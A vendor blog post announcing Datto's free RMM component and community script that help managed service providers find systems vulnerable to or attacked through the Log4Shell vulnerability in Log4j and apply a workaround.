On Friday, December 10, 2021, news broke widely of active exploitation of a critical vulnerability (CVE-2021-44228) in a common component of Java-based software, referred to as Log4j.
More information on the vulnerability and Datto’s initial response can be found in our Datto Response to Log4Shell blog.
The extent to which this software package is integrated into the world’s technologies and platforms is still being discovered, and enumeration of vulnerable instances or potential attacks can be difficult at scale.
Today, Datto has released both a Datto RMM component for its partners, and a community script for all MSPs that will help you use the power and reach of your RMM, regardless of vendor, to enumerate systems that are both potentially vulnerable and that have been potentially attacked. The tool can also attempt to protect against subsequent attacks by applying a known workaround.
Datto Partners: RMM Component
The tool is available at no charge to Datto RMM partners via the ComStore.
MSPs can use the tool on protected systems to:
Should the component identify signs of attack, a report will be produced. A Datto RMM File/Folder Size monitor can be configured to look for this report, the presence of which is an indicator that suspicious activity was detected.
MSP Community: Scripts available on Github
We also investigated the creation of a linux script, but found that Florian Roth’s Fenrir tool is all that MSPs would need, and there was no value in us repackaging that for them.
If you have an attack detection that you believe to be a true positive, and you are able to confirm that a subsequent outbound connection to a Command and Control (C2) server was made, then we suggest you work with your SIEM, SOC, MDR, MSSP or other Incident Response firm to aid you in conducting an investigation into the potential presence of a threat actor.
Now is a time to remain vigilant and take an active stance on enumerating and patching systems against this emerging threat. We hope this tool provides you the necessary support in that endeavor.
This content was originally published here.